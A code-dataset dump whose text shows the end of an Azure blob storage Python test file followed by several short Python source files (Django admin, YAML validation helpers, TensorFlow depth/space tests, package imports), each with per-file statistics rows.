def test_create_blob_with_md5_small(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data, validate_content=True)
# Assert
def test_create_blob_with_md5_large(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data, validate_content=True)
# Assert
def test_incremental_copy_blob(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
source_blob_name = self._create_blob(2048)
data = self.get_random_bytes(512)
resp1 = self.bs.update_page(self.container_name, source_blob_name, data, 0, 511)
resp2 = self.bs.update_page(self.container_name, source_blob_name, data, 1024, 1535)
source_snapshot_blob = self.bs.snapshot_blob(self.container_name, source_blob_name)
sas_token = self.bs.generate_blob_shared_access_signature(
self.container_name,
source_blob_name,
permission=BlobPermissions.READ,
expiry=datetime.utcnow() + timedelta(hours=1),
)
# Act
source_blob_url = self.bs.make_blob_url(
self.container_name,
source_blob_name, # + '?snapshot=' + source_snapshot_blob.snapshot,
sas_token=sas_token,
snapshot=source_snapshot_blob.snapshot)
dest_blob_name = 'dest_blob'
copy = self.bs.incremental_copy_blob(self.container_name, dest_blob_name, source_blob_url)
# Assert
self.assertEqual(copy.status, 'pending')
self._wait_for_async_copy(self.container_name, dest_blob_name)
self.assertIsNotNone(copy)
self.assertIsNotNone(copy.id)
copy_blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertEqual(copy_blob.properties.copy.status, 'success')
self.assertIsNotNone(copy_blob.properties.copy.destination_snapshot_time)
# strip off protocol
self.assertTrue(copy_blob.properties.copy.source.endswith(source_blob_url[5:]))
@record
def test_blob_tier_on_create(self):
ps = self._create_premium_storage_service(PageBlobService, self.settings)
try:
container_name = self.get_resource_name('utpremiumcontainer')
if not self.is_playback():
ps.create_container(container_name)
# test create_blob API
blob_name = self._get_blob_reference()
ps.create_blob(container_name, blob_name, 1024, premium_page_blob_tier=PremiumPageBlobTier.P4)
blob = ps.get_blob_properties(container_name, blob_name)
self.assertEqual(blob.properties.blob_tier, PremiumPageBlobTier.P4)
self.assertFalse(blob.properties.blob_tier_inferred)
# test create_blob_from_bytes API
blob_name2 = self._get_blob_reference()
byte_data = self.get_random_bytes(1024)
ps.create_blob_from_bytes(container_name, blob_name2, byte_data,
premium_page_blob_tier=PremiumPageBlobTier.P6)
blob2 = ps.get_blob_properties(container_name, blob_name2)
self.assertEqual(blob2.properties.blob_tier, PremiumPageBlobTier.P6)
self.assertFalse(blob.properties.blob_tier_inferred)
# test create_blob_from_path API
blob_name3 = self._get_blob_reference()
with open(FILE_PATH, 'wb') as stream:
stream.write(byte_data)
ps.create_blob_from_path(container_name, blob_name3, FILE_PATH,
premium_page_blob_tier=PremiumPageBlobTier.P10)
blob3 = ps.get_blob_properties(container_name, blob_name3)
self.assertEqual(blob3.properties.blob_tier, PremiumPageBlobTier.P10)
self.assertFalse(blob.properties.blob_tier_inferred)
# test create_blob_from_stream API
blob_name4 = self._get_blob_reference()
with open(FILE_PATH, 'rb') as stream:
ps.create_blob_from_stream(container_name, blob_name4, stream, 1024,
premium_page_blob_tier=PremiumPageBlobTier.P20)
blob4 = ps.get_blob_properties(container_name, blob_name4)
self.assertEqual(blob4.properties.blob_tier, PremiumPageBlobTier.P20)
self.assertFalse(blob.properties.blob_tier_inferred)
finally:
ps.delete_container(container_name)
@record
def test_blob_tier_set_tier_api(self):
ps = self._create_premium_storage_service(PageBlobService, self.settings)
try:
container_name = self.get_resource_name('utpremiumcontainer')
if not self.is_playback():
ps.create_container(container_name)
blob_name = self._get_blob_reference()
ps.create_blob(container_name, blob_name, 1024)
blob_ref = ps.get_blob_properties(container_name, blob_name)
self.assertEqual(PremiumPageBlobTier.P10, blob_ref.properties.blob_tier)
self.assertIsNotNone(blob_ref.properties.blob_tier)
self.assertTrue(blob_ref.properties.blob_tier_inferred)
blobs = list(ps.list_blobs(container_name))
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name)
ps.set_premium_page_blob_tier(container_name, blob_name, PremiumPageBlobTier.P50)
blob_ref2 = ps.get_blob_properties(container_name, blob_name)
self.assertEqual(PremiumPageBlobTier.P50, blob_ref2.properties.blob_tier)
self.assertFalse(blob_ref2.properties.blob_tier_inferred)
blobs = list(ps.list_blobs(container_name))
# Assert
self.assertIsNotNone(blobs)
self.assertGreaterEqual(len(blobs), 1)
self.assertIsNotNone(blobs[0])
self.assertNamedItemInContainer(blobs, blob_name)
self.assertEqual(blobs[0].properties.blob_tier, PremiumPageBlobTier.P50)
self.assertFalse(blobs[0].properties.blob_tier_inferred)
finally:
ps.delete_container(container_name)
@record
def test_blob_tier_copy_blob(self):
ps = self._create_premium_storage_service(PageBlobService, self.settings)
try:
container_name = self.get_resource_name('utpremiumcontainer')
if not self.is_playback():
ps.create_container(container_name)
# Arrange
source_blob_name = self._get_blob_reference()
ps.create_blob(container_name, source_blob_name, 1024, premium_page_blob_tier=PremiumPageBlobTier.P10)
# Act
source_blob = '/{0}/{1}/{2}'.format(self.settings.PREMIUM_STORAGE_ACCOUNT_NAME,
container_name,
source_blob_name)
copy = ps.copy_blob(container_name, 'blob1copy', source_blob,
premium_page_blob_tier=PremiumPageBlobTier.P30)
# Assert
self.assertIsNotNone(copy)
self.assertEqual(copy.status, 'success')
self.assertIsNotNone(copy.id)
copy_ref = ps.get_blob_properties(container_name, 'blob1copy')
self.assertEqual(copy_ref.properties.blob_tier, PremiumPageBlobTier.P30)
source_blob_name2 = self._get_blob_reference()
ps.create_blob(container_name, source_blob_name2, 1024)
source_blob2 = '/{0}/{1}/{2}'.format(self.settings.STORAGE_ACCOUNT_NAME,
container_name,
source_blob_name2)
copy2 = ps.copy_blob(container_name, 'blob2copy', source_blob2,
premium_page_blob_tier=PremiumPageBlobTier.P60)
self.assertIsNotNone(copy2)
self.assertEqual(copy2.status, 'success')
self.assertIsNotNone(copy2.id)
copy_ref2 = ps.get_blob_properties(container_name, 'blob2copy')
self.assertEqual(copy_ref2.properties.blob_tier, PremiumPageBlobTier.P60)
self.assertFalse(copy_ref2.properties.blob_tier_inferred)
copy3 = ps.copy_blob(container_name, 'blob3copy', source_blob2)
self.assertIsNotNone(copy3)
self.assertEqual(copy3.status, 'success')
self.assertIsNotNone(copy3.id)
copy_ref3 = ps.get_blob_properties(container_name, 'blob3copy')
self.assertEqual(copy_ref3.properties.blob_tier, PremiumPageBlobTier.P10)
self.assertTrue(copy_ref3.properties.blob_tier_inferred)
finally:
ps.delete_container(container_name)
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 44.171602 | 120 | 0.655602 | 7,085 | 58,174 | 5.051094 | 0.050106 | 0.054545 | 0.083131 | 0.061028 | 0.868332 | 0.830944 | 0.798558 | 0.775729 | 0.762875 | 0.746249 | 0 | 0.017388 | 0.258535 | 58,174 | 1,316 | 121 | 44.205167 | 0.812283 | 0.086173 | 0 | 0.625146 | 0 | 0 | 0.012143 | 0 | 0 | 0 | 0.001284 | 0 | 0.274738 | 1 | 0.079162 | false | 0.002328 | 0.009313 | 0.002328 | 0.112922 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6a4780c53eb016ea0efdab1df023361c06d7d9f | 233 | py | Python | backend/portal/admin.py | pennlabs/student-life | aaac7109b9bd2617787cb3aa813e5f736abb24a5 | [
"MIT"
] | 7 | 2019-12-25T04:11:24.000Z | 2021-10-11T05:00:17.000Z | backend/portal/admin.py | pennlabs/student-life | aaac7109b9bd2617787cb3aa813e5f736abb24a5 | [
"MIT"
] | 41 | 2019-12-25T18:37:35.000Z | 2021-10-10T19:50:21.000Z | backend/portal/admin.py | pennlabs/student-life | aaac7109b9bd2617787cb3aa813e5f736abb24a5 | [
"MIT"
] | null | null | null | from django.contrib import admin
from portal.models import Poll, PollOption, PollVote, TargetPopulation
admin.site.register(TargetPopulation)
admin.site.register(Poll)
admin.site.register(PollOption)
admin.site.register(PollVote)
| 23.3 | 70 | 0.832618 | 29 | 233 | 6.689655 | 0.448276 | 0.185567 | 0.350515 | 0.340206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077253 | 233 | 9 | 71 | 25.888889 | 0.902326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e6b72696960991e5eee5510671bdcdeaaeb6d056 | 1,341 | py | Python | mazikeen/GeneratorUtils.py | hanniballar/mazikeen | 68693a96c69376f18c21576a610470a543a89316 | [
"MIT"
] | null | null | null | mazikeen/GeneratorUtils.py | hanniballar/mazikeen | 68693a96c69376f18c21576a610470a543a89316 | [
"MIT"
] | 3 | 2021-04-05T17:14:21.000Z | 2021-04-06T21:49:41.000Z | mazikeen/GeneratorUtils.py | hanniballar/mazikeen | 68693a96c69376f18c21576a610470a543a89316 | [
"MIT"
] | null | null | null | from mazikeen.GeneratorException import GeneratorException
def getYamlInt(data, line, field):
if data == None: return None
if (not isinstance(data, int)):
if (isinstance(data, dict)):
raise GeneratorException(f"field '{field}' expects an integer at line {data['__line__']}")
raise GeneratorException(f"field '{field}' expects an integer at line {line}")
return data
def getYamlBool(data, line, field):
if (not isinstance(data, bool)):
if (isinstance(data, dict)):
raise GeneratorException(f"field '{field}' expects a bool at line {data['__line__']}")
raise GeneratorException(f"field '{field}' expects a bool at line {line}")
return data
def getYamlString(data, line, field):
if (not isinstance(data, str)):
if (isinstance(data, dict)):
raise GeneratorException(f"field '{field}' expects an integer at line {data['__line__']}")
raise GeneratorException(f"field '{field}' expects a string at line {line}")
return data
def getYamlList(data, line, field):
if (not isinstance(data, list)):
if (isinstance(data, dict)):
raise GeneratorException(f"field '{field}' expects a list at line {data['__line__']}")
raise GeneratorException(f"field '{field}' expects a list at line {line}")
return data | 43.258065 | 102 | 0.661447 | 166 | 1,341 | 5.246988 | 0.180723 | 0.073479 | 0.220436 | 0.266361 | 0.80023 | 0.784156 | 0.718714 | 0.608496 | 0.608496 | 0.608496 | 0 | 0 | 0.213274 | 1,341 | 31 | 103 | 43.258065 | 0.825592 | 0 | 0 | 0.384615 | 0 | 0 | 0.314456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.038462 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6fd64514a121a0a5221a8eecdf15038b210fc41 | 25 | py | Python | hurricane/testing/__init__.py | marty-2015/django-hurricane | fe05ed1360ad504167aa403c999357eb4f0cdb8b | [
"MIT"
] | 30 | 2020-12-23T21:07:42.000Z | 2022-03-24T17:09:43.000Z | hurricane/testing/__init__.py | marty-2015/django-hurricane | fe05ed1360ad504167aa403c999357eb4f0cdb8b | [
"MIT"
] | 60 | 2021-02-05T13:20:32.000Z | 2022-03-24T20:56:48.000Z | hurricane/testing/__init__.py | marty-2015/django-hurricane | fe05ed1360ad504167aa403c999357eb4f0cdb8b | [
"MIT"
] | 3 | 2021-02-11T10:46:09.000Z | 2021-11-04T16:48:15.000Z | from .testcases import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e6fd8ee7ab487bf229e65c12e52cacb00dedcfc6 | 23 | py | Python | preprocessing/spelchek/__init__.py | fnatanoy/toxic_comments_classification | 780939be69b7b7ed6e99a09a5247ca219e7c1fe4 | [
"MIT"
] | null | null | null | preprocessing/spelchek/__init__.py | fnatanoy/toxic_comments_classification | 780939be69b7b7ed6e99a09a5247ca219e7c1fe4 | [
"MIT"
] | null | null | null | preprocessing/spelchek/__init__.py | fnatanoy/toxic_comments_classification | 780939be69b7b7ed6e99a09a5247ca219e7c1fe4 | [
"MIT"
] | null | null | null | from . import spelchek
| 11.5 | 22 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc03bca31e14d3daefd1373b631951f8a7cc4253 | 5,704 | py | Python | tests/ops/test_convolution.py | 897615138/tfsnippet-jill | 2fc898a4def866c8d3c685168df1fa22083bb143 | [
"MIT"
] | 63 | 2018-06-06T11:56:40.000Z | 2022-03-22T08:00:59.000Z | tests/ops/test_convolution.py | 897615138/tfsnippet-jill | 2fc898a4def866c8d3c685168df1fa22083bb143 | [
"MIT"
] | 39 | 2018-07-04T12:40:53.000Z | 2022-02-09T23:48:44.000Z | tests/ops/test_convolution.py | 897615138/tfsnippet-jill | 2fc898a4def866c8d3c685168df1fa22083bb143 | [
"MIT"
] | 34 | 2018-06-25T09:59:22.000Z | 2022-02-23T12:46:33.000Z | import numpy as np
import tensorflow as tf
from mock import mock
from tests.layers.convolutional.helper import (input_maybe_to_channels_last,
output_maybe_to_channels_first)
from tfsnippet.ops import space_to_depth, depth_to_space
tf_space_to_depth = tf.space_to_depth
tf_depth_to_space = tf.depth_to_space
def patched_space_to_depth(input, block_size, data_format):
input = input_maybe_to_channels_last(input, data_format=data_format)
output = tf_space_to_depth(
input=input, block_size=block_size, data_format='NHWC')
output = output_maybe_to_channels_first(output, data_format=data_format)
return output
def naive_space_to_depth(x, bs, channels_last):
if channels_last:
h, w, c = x.shape[-3:]
h2, w2, c2 = h // bs, w // bs, c * bs * bs
y = np.reshape(x, x.shape[:-3] + (h2, bs) + (w2, bs) + (c,))
y = np.transpose(
y, list(range(len(y.shape) - 5)) + [-5, -3, -4, -2, -1])
y = np.reshape(y, (x.shape[:-3] + (h2, w2, c2)))
else:
c, h, w = x.shape[-3:]
h2, w2, c2 = h // bs, w // bs, c * bs * bs
y = np.reshape(x, x.shape[:-3] + (c,) + (h2, bs) + (w2, bs))
y = np.transpose(
y, list(range(len(y.shape) - 5)) + [-3, -1, -5, -4, -2])
y = np.reshape(y, (x.shape[:-3] + (c2, h2, w2)))
return y
def patched_depth_to_space(input, block_size, data_format):
input = input_maybe_to_channels_last(input, data_format=data_format)
output = tf_depth_to_space(
input=input, block_size=block_size, data_format='NHWC')
output = output_maybe_to_channels_first(output, data_format=data_format)
return output
def naive_depth_to_space(x, bs, channels_last):
if channels_last:
h, w, c = x.shape[-3:]
h2, w2, c2 = h * bs, w * bs, c // (bs * bs)
y = np.reshape(x, x.shape[:-3] + (h, w, bs, bs, c2))
y = np.transpose(
y, list(range(len(y.shape) - 5)) + [-5, -3, -4, -2, -1])
y = np.reshape(y, (x.shape[:-3] + (h2, w2, c2)))
else:
c, h, w = x.shape[-3:]
h2, w2, c2 = h * bs, w * bs, c // (bs * bs)
y = np.reshape(x, x.shape[:-3] + (bs, bs, c2, h, w))
y = np.transpose(
y, list(range(len(y.shape) - 5)) + [-3, -2, -5, -1, -4])
y = np.reshape(y, (x.shape[:-3] + (c2, h2, w2)))
return y
class SpaceToDepthTestCase(tf.test.TestCase):
def test_space_to_depth(self):
with self.test_session() as sess, \
mock.patch('tensorflow.space_to_depth', patched_space_to_depth):
# static shape, bs = 2, channels_last = True
x = np.random.normal(size=[5, 8, 12, 7]).astype(np.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x, 2, True)),
naive_space_to_depth(x, 2, True)
)
# static shape, bs = 3, channels_last = False
x = np.random.normal(size=[4, 5, 7, 6, 9]).astype(np.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x, 3, False)),
naive_space_to_depth(x, 3, False)
)
# dynamic shape, bs = 2, channels_last = True
x = np.random.normal(size=[4, 5, 8, 12, 7]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, None, None, None, 7],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x_ph, 2, True), feed_dict={x_ph: x}),
naive_space_to_depth(x, 2, True)
)
# dynamic shape, bs = 3, channels_last = False
x = np.random.normal(size=[5, 7, 6, 9]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, 7, None, None],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(space_to_depth(x_ph, 3, False), feed_dict={x_ph: x}),
naive_space_to_depth(x, 3, False)
)
class DepthToSpaceTestCase(tf.test.TestCase):
def test_depth_to_space(self):
with self.test_session() as sess, \
mock.patch('tensorflow.depth_to_space', patched_depth_to_space):
# static shape, bs = 2, channels_last = True
x = np.random.normal(size=[5, 4, 6, 28]).astype(np.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x, 2, True)),
naive_depth_to_space(x, 2, True)
)
# static shape, bs = 3, channels_last = False
x = np.random.normal(size=[4, 5, 63, 2, 3]).astype(np.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x, 3, False)),
naive_depth_to_space(x, 3, False)
)
# dynamic shape, bs = 2, channels_last = True
x = np.random.normal(size=[4, 5, 4, 6, 28]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, None, None, None, 28],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x_ph, 2, True), feed_dict={x_ph: x}),
naive_depth_to_space(x, 2, True)
)
# dynamic shape, bs = 3, channels_last = False
x = np.random.normal(size=[5, 63, 2, 3]).astype(np.float32)
x_ph = tf.placeholder(shape=[None, 63, None, None],
dtype=tf.float32)
np.testing.assert_allclose(
sess.run(depth_to_space(x_ph, 3, False), feed_dict={x_ph: x}),
naive_depth_to_space(x, 3, False)
)
| 41.035971 | 80 | 0.547861 | 828 | 5,704 | 3.571256 | 0.107488 | 0.040243 | 0.068989 | 0.039567 | 0.858979 | 0.809604 | 0.802164 | 0.764964 | 0.764964 | 0.73791 | 0 | 0.04119 | 0.310484 | 5,704 | 138 | 81 | 41.333333 | 0.710653 | 0.061536 | 0 | 0.5 | 0 | 0 | 0.010853 | 0.009356 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.055556 | false | 0 | 0.046296 | 0 | 0.157407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3ba752a40f0e57983b61bc49acece5b6ef57a3 | 466 | py | Python | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | sngan_projection/links/__init__.py | tanikawa04/sngan_projection | cb463dd30ad485b0bbaef945728251153edba920 | [
"MIT"
] | null | null | null | from sngan_projection.links.categorical_conditional_batch_normalization import CategoricalConditionalBatchNormalization
from sngan_projection.links.conditional_batch_normalization import ConditionalBatchNormalization
from sngan_projection.links.sn_convolution_2d import SNConvolution2D
from sngan_projection.links.sn_convolution_nd import SNConvolutionND
from sngan_projection.links.sn_embed_id import SNEmbedID
from sngan_projection.links.sn_linear import SNLinear
| 66.571429 | 119 | 0.922747 | 54 | 466 | 7.62963 | 0.407407 | 0.131068 | 0.276699 | 0.349515 | 0.305825 | 0.179612 | 0 | 0 | 0 | 0 | 0 | 0.004525 | 0.051502 | 466 | 6 | 120 | 77.666667 | 0.927602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc87759f00df90701c53a9670035c9d27c594fce | 152 | py | Python | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | toolcache/cachetypes/__init__.py | sslivkoff/toolcache | 62fb3441adb03fdee4fdbca14605f0ecec2ad44c | [
"Apache-2.0"
] | null | null | null | from .base_cache import BaseCache
from .disk_cache import DiskCache
from .memory_cache import MemoryCache
from .cachetype_utils import get_cache_class
| 25.333333 | 44 | 0.861842 | 22 | 152 | 5.681818 | 0.590909 | 0.264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111842 | 152 | 5 | 45 | 30.4 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.